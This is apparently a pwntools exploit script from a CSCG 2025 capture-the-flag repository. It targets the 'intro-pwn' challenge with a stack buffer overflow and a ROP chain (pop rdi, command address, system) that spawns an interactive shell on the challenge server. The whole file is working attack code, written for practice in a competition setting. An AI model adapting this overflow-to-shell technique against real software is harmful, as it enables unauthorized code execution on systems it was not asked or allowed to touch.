Files
ctf/cscg25/pwn/intro1/exploit.py
2025-03-10 05:11:20 +01:00

35 lines
834 B
Python

from pwn import *
# Set the context for the binary
context.binary = './intro-pwn' # Replace with your binary's name
# Choose local or remote
LOCAL = False # Change to False if connecting remotely
if LOCAL:
p = process(context.binary.path)
else:
p = remote("a05e1cfb314bce1c87472c7e-1024-intro-pwn-1.challenge.cscg.live", 1337, ssl=True)# Define functions for convenience
def send_payload(payload):
p.sendline(payload)
def recv_until(delim):
return p.recvuntil(delim)
def interact():
p.interactive()
address = 0x4011c7
system = 0x4011d5
pop_rdi = 0x401205
command_addr = 0x402010
# Example interaction
recv_until(b'What is your name?')
payload = b'A' * 16 + b'\x00' * 8 + p64(pop_rdi) + p64(command_addr) + p64(system)# Adjust based on your needs
send_payload(payload)
interact() # Keep the shell open